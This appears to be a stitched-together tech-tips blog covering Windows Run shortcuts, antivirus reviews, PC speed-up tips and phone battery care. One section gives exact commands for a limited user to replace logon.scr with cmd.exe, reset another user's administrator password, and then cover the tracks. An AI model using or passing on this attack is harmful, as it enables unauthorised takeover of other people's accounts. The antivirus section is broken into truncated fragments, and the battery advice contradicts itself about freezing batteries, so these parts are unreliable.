How to Create Your Own Customized Run Commands

ARTICLE BY GOWTHAM

The Run command on Microsoft Windows operating system allows you to directly open an application or document with just a single command instead of navigating to it’s location and double-clicking the executable icon. However, it only works for some of the inbuilt Windows programs such as Command prompt (cmd), Calculator (calc) etc. So, have you ever wondered how to create your own customized Run commands for accessing your favorite programs, files and folders? Well, read on to find out the answer.

Creating the Customized Run Command

Let me take up an example of how to create a customized run command for opening the Internet explorer. Once you create this command, you should be able to open the Internet explorer just by typing “ie” (without quotes) in the Run dialog box. Here is how you can do that.
1. Right click on your Desktop and select New -> Shortcut.
2. You will see a “Create Shortcut” Dialog box as shown below
Create Shortcut

3. Click on “Browse”, navigate to: Program Files -> Internet Explorer from your Root drive (usually C:\) and select “iexplore” as shown in the above figure and click on “OK”.
4. Now click on “Next” and type any name for your shortcut. You can choose any name as per your choice; this will be your customized “Run command”. In this case I name my shortcut as “ie”. Click on “Finish”.
5. You will see a shortcut named “ie” on your desktop. All you need to do is just copy this shortcut and paste it in your Windows folder (usually “C:/Windows”). Once you have copied the shortcut onto your Windows folder, you can delete the one on your Desktop.
6. That’s it! From now on, just open the Run dialog box, type ie and hit Enter to open the Internet Explorer.
In this way you can create customized Run commands for any program of your choice. Say “ff” for Firefox, “ym” for Yahoo messenger, “wmp” for Windows media player and so on.
To do this, when you click on “Browse” in the Step-3, just select the target program’s main executable (.exe) file which will usually be located in the C:\Program Files folder. Give a simple and short name for this shortcut as per your choice and copy the shortcut file onto the Windows folder as usual. Now just type this short name in the Run dialog box to open the program.
I hope you like this post! Pass your comments.

HOW TO HACK WINDOWS ADMIN PASSWORD

provided by ur"s GowThaM
If you log into a limited account
on your target machine and
open up a dos prompt
then enter this set of commands
Exactly:
cd\ *drops to root
cd\windows\system32 *directs
to the system32 dir
mkdir temphack *creates the
folder temphack
copy logon.scr temphack
\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe
*backsup cmd.exe
del logon.scr *deletes original
logon.scr
rename cmd.exe logon.scr
*renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is
told the computer to backup the
command program
and the screen saver file, then
edits the settings so when the
machine boots the
screen saver you will get an
unprotected dos prompt with
out logging into XP.
Once this happens if you enter
this command minus the quotes
"net user password"
If the Administrator Account is
called Frank and you want the
password blah enter this
"net user Frank blah"
and this changes the password
on franks machine to blah and
your in.
Have fun
p.s: dont forget to copy the
contents of temphack back into
the system32 dir to cover tracks

perfectly fine. To see the whole
review and how to install MSE on
your computer,please click this
link.
2) Avast ! Free Antivirus : Avast

competitor to other Antivirus
programs as it is very simple and
easy to use. Avast is loaded with
most features, real-time
protection capabilities including
web, E-mail, P2P, network shields,
boot-time scanning. It is very

take minutes to schedule scans.
But there is one negative point
that you have to register first and
it takes time to register.
Otherwise it is widely preferred
Antivirus program for many
users.
3) AVG Free Antivirus : AVG has
been around in the Antivirus
market from ages and gained lot
of loyal users to their kitty. They

part of Avira is that it is quiet
outstanding in terms of finding
malware. Few false positives
about Avira is that it does not
inlude E-mail scanner in free
version, but if you open any
infected E-mail, it comes again
into action. And with every
update, it shows advertisements
but you have choice to disable
them. I still believe that Avira is
strong Antivirus program and
you should try it.
6) Comodo Antivirus + Firewall :

Ikarus antivirus engine. It scans
your computer from Trojans,
Viruses, Spyware, Adware,
Worms, Bots, Keyloggers and
Dialers. The only negative point
about this software is its large
virus update size. Its comes with
Antivirus + Anti– Spyware.
8 ) Rising Antivirus : Rising
Antivirus Free Edition is Antivirus
solution from China. It is a simple
program which runs low on the
memory and do every bit of task
that every other Antivirus
software does. It protects
computers against all types of
viruses, Trojans, worms, rootkits
and other malicious programs.
One feature is good is that it

forget” program, this program is
best.
9) PC Tools Antivirus : All-in-one
program which can protect your
PC from virus, worms, trojans
and also included scanning of
incoming and outgoing mails. It
provides you on-demand scans
and automatic updates. The
negative points are that free
edition offers limited support
and updates are non-priority
based which are essential for
real-timevirus protection
program.
10) Spyware Doctor with
Antivirus 2010 : As the name
suggests, its comes with Anti-
spyware and Antivirus program
which provides full security to
your computer. It detects almost

HOW TO SPEED UR PC QUICKLY...6 tips

provided by ur"s GowThaM
By following a few simple
guidelines, you can maintain
your computer, help increase
your PC speed, and help keep it
running smoothly. This article
discusses how to use the tools
available in Windows 7, Windows
Vista, andWindows XP Service
Pack 3 to help make your
computer faster, maintain your
computer efficiently, and help
safeguard your privacy when
you're online.
Note: Some of the tools
mentioned in this article require
you to be logged on as an
administrator. If you aren't
logged on as an administrator,
you can only change settings that
apply to your user account.
1. Remove spyware, and help
protect your computer from
viruses
Spyware collects personal
information without letting you
know and without asking for
permission. From the websites
you visit to user names and
passwords, spyware can put you
and your confidential
information at risk. In addition to
privacy concerns, spyware can
hamper your computer's
performance. To combat
spyware, you might want to
consider using the PC safety scan
from Windows Live OneCare. This
scan is a free service that helps
check for and remove viruses.
Download Microsoft Security
Essentialsfor free to help guard
your system in the future from
viruses, spyware, adware, and
other malicious software (also
known as malware). Microsoft
Security Essentials acts as a
spyware removal tool and
includes automatic updates to
help keep your system protected
from emerging threats.
The Microsoft Windows Malicious
Software Removal Tool is another
utility that checks computers
running Windows 7, Windows
Vista, Windows XP, Windows
2000, and Windows Server 2003
for infections by specific,
prevalent malicious software,
including Blaster, Sasser, and
Mydoom, and helps remove any
infection found.2. Free up disk space
The Disk Cleanup tool helps you
to free up space on your hard
disk to improve the performance
of your computer. The tool
identifies files that you can safely
delete and then enables you to
choose whether you want to
delete some or all of the
identified files.
Use Disk Cleanup to:
Remove temporary Internet files.
Delete downloaded program
files, such as Microsoft ActiveX
controls and Java applets.
Empty the Recycle Bin.
Remove Windows temporary
files, such as error reports.
Delete optional Windows
components that you don't use.
Delete installed programs that
you no longer use.
Remove unused restore points
and shadow copies from System
Restore.
Tip: Typically, temporary Internet
files take the most amount of
space because the browser
caches each page you visit for
faster access later.
To use Disk Cleanup:
Windows 7 users
Windows Vista users
Windows XP users3. Speed up access to data
Disk fragmentation slows the
overall performance of your
system. When files are
fragmented, the computer must
search the hard disk as a file is
opened (to piece it back
together). The response time can
be significantly longer.
Disk Defragmenter (sometimes
shortened to Defrag by users) is
a Windows utility that
consolidates fragmented files
and folders on your computer's
hard disk so that each occupies a
single space on the disk. With
your files stored neatly end to
end, without fragmentation,
reading and writing to the disk
speeds up.
When to run Disk Defragmenter
In addition to running Disk
Defragmenter at regular intervals
(weekly is optimal), there are
other times you should run it,
too, such as when:
You add a large number of files.
Your free disk space totals 15
percent or less.
You install new programs or a
new version of the Windows
operating system.
To use Disk Defragmenter:
Windows 7 users
1. Click Start, click All Programs,
click Accessories, click System
Tools, and then click Disk
Defragmenter.
2. In the Disk Defragmenter dialog
box, click the drives that you
want to defragment, and then
click theAnalyze disk button.
After the disk is analyzed, a
dialog box appears, letting you
know whether you should
defragment the analyzed drives.
Tip: You should analyze a volume
before defragmenting it to get
an estimate of how long the
defragmentation process will
take.
3. To defragment the selected drive
or drives, click theDefragment
disk button. In the Current
status area, under the Progress
column, you can monitor the
process as it happens. After the
defragmentation is complete,
Disk Defragmenter displays the
results.
4. To display detailed information
about the defragmented disk or
partition, clickView Report.
5. To close the View Report dialog
box, click Close.
6. You can also schedule the Disk
Defragmenter to run
automatically. (Your computer
might even be set up this way by
default.) UnderSchedule, it reads
Scheduled defragmentation is
turned onand then displays the
time of day and frequency of
defragmentation. If you want to
turn off automatic
defragmentation or to change
the time or frequency, click
Configure schedule (or Turn on
Schedule, if it is not currently
configured to run automatically).
Change the settings, and then
clickOK.
7. To close the Disk Defragmenter
utility, on the title bar of the
window, click theClose button.
Windows Vista users
Windows XP users
1. Click Start, point to All Programs,
point to Accessories, point to
System Tools, and then click Disk
Defragmenter.
2. In the Disk Defragmenter dialog
box, click the drives that you
want to defragment and then
click theAnalyze button. After
the disk is analyzed, a dialog box
appears, letting you know
whether you should defragment
the analyzed drives.
Tip: You should analyze a volume
before defragmenting it to get
an estimate of how long the
defragmentation process will
take.
3. To defragment the selected drive
or drives, click theDefragment
button. Note: In Windows Vista,
there is no graphical user
interface to demonstrate the
progress—but your hard drive is
still being defragmented.
After the defragmentation is
complete, Disk Defragmenter
displays the results.
4. To display detailed information
about the defragmented disk or
partition, clickView Report.
5. To close the View Report dialog
box, click Close.
6. To close the Disk Defragmenter
utility, on the title bar of the
window, click theClose button.
Running Disk Cleanup and Disk
Defragmenter on a regular basis
is a proven way to help keep
your computer running quickly
and efficiently. If you'd like to
learn how to schedule these
tools and others to run
automatically, please read Speed
up your PC: Automate your
computer maintenance schedule.4. Detect and repair disk errors
In addition to running Disk
Cleanup and Disk Defragmenter
to optimize the performance of
your computer, you can check
the integrity of the files stored on
your hard disk by running the
Error Checking utility.
As you use your hard drive, it can
develop bad sectors. Bad sectors
slow down hard disk
performance and sometimes
make data writing (such as file
saving) difficult or even
impossible. The Error Checking
utility scans the hard drive for
bad sectors and scans for file
system errors to see whether
certain files or folders are
misplaced.
If you use your computer daily,
you should run this utility once a
week to help prevent data loss.
Run the Error Checking utility:5. Learn about ReadyBoost
If you're using Windows 7 or
Windows Vista, you can use
ReadyBoost to speed up your
system. A new concept in adding
memory to a system, it allows
you to use non-volatile flash
memory—like a USB flash drive
or a memory card—to improve
performance without having to
add additional memory.

6. Upgrade to Windows 7
If you try all the previous
remedies and your computer still
isn't as fast as you would like it
to be, you may want to consider
updating to Windows 7.

TOP 20 TIPS TO INCREASE YOUR PC PERFORMANCE

provided by ur"s GowThaM
Follow these tips and you will
definitely have a much faster and
more reliable PC! The icon
means that the tip will work best
under Windows 98.
1. Wallpapers: They slow your
whole system down, so if you're
willing to compromise, have a
basic plain one instead!
2. Drivers: Update your
hardware drivers as frequently
as possible. New drivers tend to
increase system speed especially
in the case of graphics cards,
their drivers are updated by the
manufacturer very frequently!
3. Minimizing: If you want to use
several programs at the same
time then minimize those you are
not using. This helps reduce the
overload on RAM.
4. Boot Faster: The 'starting
Windows 95/98' message on
startup can delay your booting
for a couple of seconds. To get
rid of this message go to c:\ and
find the file Msdos.sys. Remove
the Read-Only option. Next, open
it in Notepad or any other text
editor. Finally, go to the text
'Options' within the file and
make the following changes: Add
BootDelay=0. To make your
booting even faster, set add
Logo=0 to remove the Windows
logo at startup.
5. Restart only Windows: When
restarting your PC, hold down
Shift to only restart Windows
rather than the whole system
which will only take a fraction of
the time.
6. Turn Off Animations: Go
to Display Settings from the
Control Panel and switch to the
Effects Tab. Now turn off Show
Windows Content While Dragging
and Smooth Edges on Screen
Fonts. This tip is also helpful
with Windows XP because of the
various fade/scroll effects.
7. Faster Start-Menu Access: Go
to the Start menu and select Run.
Now type Regedit and hit Enter.
The Registry Editor will appear
on the screen. Now, open the
folderHKEY_CURRENT_USER
\Control Panel\Desktop. You
should see a MenuShowDelay
value. If you don't then do the
following: right click on a blank
space in the right pane and
select New\String. Change the
name in the new value to
MenuShowDelay. Now that we
have the MenuShowDelay value,
double click on it and enter0 in
the value data field. This sets the
start menu delay to 0
milliseconds.
8. Resolutions: If you are willing
to do anything for faster
performance from your PC, then
try lowering your display
resolution. The lower it is, the
faster your PC.
9. Turn off Active Desktop:
Go to your Display Properties and
switch to the Web tab. Uncheck
View My Active Desktop As a Web
Page. Since the Active Desktop
option under Windows 98 uses a
lot of system resources, this
option can have a dramatic effect
on the speed of the whole
system.
10. Defragment Often:
Windows 98's Defrag tool uses
Application Acceleration from
Intel which means that when you
defragment your drive, data is
physically arranged on the drive
so that applications will load
faster.
11. Take your PC to Bed:
Using the Advanced Power
Management feature under
Windows 98 gives you the
option to use the sleep
command. That way, you can
send your PC to sleep instead of
shutting it down and then
restarting it. It's as simple as
pressing a button and then
pressing the same button to
wake it up. You can tell Windows
after how many minutes/hours
of inactivity to automatically sleep
the machine in the Advanced
Power Management section of
the Control Panel.
12. Faster Internet Access: If
you use the internet for
reference and the sites you visit
are rarely updated then try the
following. In IE (the same can be
done in Netscape) go to Tools,
Internet Options. Next, click on
Settings... in the Temporary
Internet Files section. Finally,
select Never for the first option
and double the amount of
storage space to use, click OK!
13. Benchmarking:
Benchmarking can be very useful
when run frequently. It can tell
you how your PC's components
are performing and then
compare them to other machines
like yours. For example, when
you overclock your PC, you want
to know how much more speed
you have and whether it is
stable. All this and more can be
discovered using benchmarking.
An excellent piece of software for
doing this job is SiSoft Sandra
which can be found in the
Downloads File Archive!
14. Refresh the Taskbar without
restarting: If you in some way
change the taskbar, either in
Regedit or elsewhere, you can
refresh the task bar without
restarting. Hold down Ctrl Alt Del,
and double click on Explorer. Say
Yes to close Explorer, but no to
closing Windows. This will
refresh the Taskbar and system
tray.
15. Quick CD Eject: Instead of
pushing the button on your
drive, right-click your CD drive
letter in My Computer and click
on Eject. This will also remove
any icons that have become
associated with the CD drive.
16. Start Up Programs:
Windows can be slowed down
when programs run on start up.
To eliminate this, check your Start
up folder. You can access it from
the start menu: Start, Programs,
Start Up. Another way to
eliminate programs from loading
even before Windows actually
starts is by doing the following:
Click on Start, then Run. Type
msconfig. It will take quite a
long time for this program to
load, but when you finally see it
on your screen, explore the
different tabs. They all have to
do with how quickly your PC
boots, so select what you want,
and uncheck what you don't
want!
17. Fonts: When Windows starts,
it loads every single font in the
Fonts folder. Therefore, the more
fonts you have, the slower the
booting process. To get rid of
unwanted fonts, simply go to the
Fonts folder under c:\windows
and remove whatever you don't
want. Fonts that have a red letter
'A' as their icon are system fonts,
so don't delete them.
18. Stretching Wallpapers:
Don't "stretch" your wallpaper in
Windows 98 since it actually
slows Windows down when you
drag icons around on the
desktop.
19. RAM Matters: If you have less
than 32MB then you should
seriously think of upgrading it to
at least 64MB. Windows runs
much more smoothly with 64MB
or higher and tends to use less
hard disk space for virtual
memory.
20. Partitioning: A very nice little
thing you can do to boost system
performance. By partitioning
your hard drive, splitting one
physical drive into several logical
ones, you can gain several
advantages. 1. If you get a virus
or you accidentally format a
drive, not all will be lost. 2. By
placing the swap file
(Win386.swp) on a separate
drive, The swap file will be less
fragmented and thus, faster. 3.
Place Windows on a separate
drive and whenever you need to
reinstall it, you rest assured that
your data is safe on a separate
drive. Partitioning can be done
using a few programs such as
FDisk which comes with DOS.
However, FDisk formats
everything on the hard disk
before partitioning. Alternatively,
you can use Partition Magic from
Power Quest to partition your
hard disk without losing your
data

HOW TO INCREASE BATTERY LIFE OF YOUR MOBILE

provided by ur"s GowThaM
Turn the phone off. This will
probably be the most effective
and simple way of conserving
your battery’s power. Why? This
will help conserve energy and
also charge your phone. If you
don't plan on answering the
phone while you're sleeping or
after business hours, just turn it
off. Do the same if you are in an
area with no reception (such as a
subway or remote area, since
constantly searching for service
depletes the battery fairly quickly.
Some phones have an automatic
power save feature, but it takes
about 30 minutes with no
service to kick in. By then, much
battery power has been used. If
you don't need to receive or
make calls but are using a
smartphone as a PDA, disable the
phone functionality (flight mode).
Stop searching for a
signal. When you are
in an area with poor
or no signal, your
phone will constantly
look for a better
connection, and will
use up all your power
doing so. This is
easily understood if
you have ever
forgotten to turn off your phone
on a flight. The best way to
ensure longer battery life is to
make sure you have a great
signal where you use your
phone. If you don't have a
perfect signal, get a cell phone
repeater which will amplify the
signal to provide near perfect
reception anywhere.
Switch the vibrate function off
on your phone, using just the
ring tone. The vibrate function
uses additional battery power.
Keep the ring tone volume as low
as possible.
Turn off your
phone's back light.
The back light is what
makes the phone
easier to read in
bright light or
outside. However, the
light also uses battery
power. If you can get
by without it, your
battery will last
longer. If you have to
use the back light,
many phones will let you set the
amount of time to leave the back
light on. Shorten that amount of
time. Usually, one or two seconds
will be sufficient. Some phones
have an ambient light sensor,
which can turn off the back light
in bright conditions and enable it
in darker ones.
Avoid using unnecessary
features. If you know it will be a
while before your phone’s next
charge, don’t use the camera or
connect to the Internet. Flash
photography can drain your
battery especially quickly.
Keep calls short. This is obvious,
but how many times have you
heard someone on their mobile
phone say, "I think my battery’s
dying," and then continue their
conversation for several
minutes? Sometimes, the dying
battery is just an excuse to get
off the phone (and a good one,
at that), but if you really need to
conserve the battery, limit your
talk time.
Turn off Bluetooth. It will drain
your battery very quickly.
Same goes for WIFI, GPS, and
infrared capabilities, if your
phone has these features built
in. Keep them off except when
you need them to save power.
Use GSM rather than 3G - Using
your phone in 3G / Dual Mode
will drain the battery quicker
than if you just use GSM mode -
have a look at your phones
spec and you'll see it will quote
two different battery life times
- normally 50% more for pure
GSM use.
With a smartphone, avoid using
moving or animated pictures or
videos for your background.
Animated backgrounds will drain
the battery faster.
Use a black background
whenever possible. AMOLED
screens use a lot less power
displaying black instead of white
[1]. When web browsing use
sites like bGoog.com [1] that
display a black Google
background instead of white.
Prolong the Life of Your Battery
Initialize a new battery. New
batteries should be fully charged
before their first use to obtain
maximum capacity. Nickel-based
batteries should be charged for
16 hours initially and run
through 2-4 full charge/full
discharge cycles, while lithium
ion batteries should be charged
for about 5-6 hours. Ignore the
phone telling you that the battery
is full—this is normal but is not
accurate if the battery is not
initialized. #DO NOT fully
discharge a lithium-ion battery!
Unlike Ni-Cd batteries, lithium-ion
batteries' life is shortened every
time you fully discharge them.
Instead, charge them when the
battery meter shows one bar left.
Lithium-ion batteries, like most
rechargeable batteries, have a set
number of charges in them.[2]
Keep the battery cool. Put the
battery in the freezer or fridge.
Your battery will last longest if
used near room temperature,
and nothing wears on a battery
like extended exposure to high
temperatures. While you can’t
control the weather, you can
avoid leaving your phone in a hot
car or in direct sunlight, and you
don’t have to carry your phone in
your pocket, where your body
heat will raise its temperature. In
addition, check the battery while
it’s charging. If it seems
excessively hot, your charger may
be malfunctioning.
Charge your battery correctly,
in accordance with its type.
Most newer cell phones have
lithium-ion batteries, while older
ones generally have nickel-based
batteries. Read the label on the
back of the battery or in the
technical specifications in the
manual to determine which
yours is.
Nickel-based batteries (either
NiCd or NiMH) DO NOT generally
suffer from a misunderstood
phenomenon known as the
"memory effect." As described in
Wikipedia and many expert
sources,[3] the term "memory
effect" has been widely
mythologized to describe any
and all deterioration of NiCd (and
other battery chemistries), in
many cases misleading
consumers into further
shortening the lives of the
batteries through over-
discharging to "recondition"
them.[4]
[This section formerly read: If
you charge the battery partially
enough times, eventually the
battery "forgets" that it can
charge fully. A nickel-based
battery suffering from memory
effect can be reconditioned,
which requires the battery to be
completely discharged, then
completely recharged
(sometimes several times). The
appropriate length of time
between reconditionings varies.
A good rule to follow for nickel-
battery cell-phones is to
discharge them completely once
every two to three weeks, and
only when you have a charger
available. [5] ]
Lithium ion batteries can be
preserved by careful charging
and avoiding storing them at full
charge.[6] They do not require
"reconditioning."
Regardless of the battery type,
use only a charger rated for your
battery, and discontinue use of a
charger that causes the battery
to heat up excessively.
Store batteries properly. If your
battery will be out of use for a
while, disconnect it from the
phone and store it in a cool and
dry but not freezing place (an
airtight container in a
refrigerator, but not a freezer).
Don't keep it with metal objects
that might move around and
short-circuit the terminals.
Lithium ion batteries are not
rated to operate at refrigerated
temperatures, so let the battery
sit outside the refrigerator for at
least an hour before using it
again. Lithium ion batteries
oxidize least when they are
stored at 40% charge. Never
store a lithium battery at low
voltage. Recharge batteries after
storage.
Clean the battery contacts on
the battery and on the phone.
Over time, contacts may
accumulate dirt which reduce the
efficiency of energy transfer.
Clean them with a cotton swab
and rubbing or isopropyl alcohol.
If the contacts are two different
metals, such as gold and tin,
accelerated corrosion known as
"galvanic or bi-metallic" occurs.
Cutting the corrosion from the
contacts often requires solvents,
such as acetone or nail polish
remover. Be careful: these solvent
dissolve plastic, so use a Q-Tip to
avoid damaging the battery
housing or the phone.
Battery Failure Indicators
The usable time after recharging
is shortened.
The battery becomes unusually
warm during a recharge cycle.
The battery becomes unusually
warm during phone use.
The battery case may become
swollen. This is detectable by
feeling and viewing the inside/
phone-side of the battery case.
Also, when the battery is placed
inside/phone-side down on a
flat, smooth surface, it will rock
and will sustain a spin motion.
The case of a healthy battery is
flat, and the battery will not a
spin easily.
The battery develops a hard spot.
This is detectable on the inside/
phone-side surface of the battery
by gently pinching about the
surface between one's fingers.
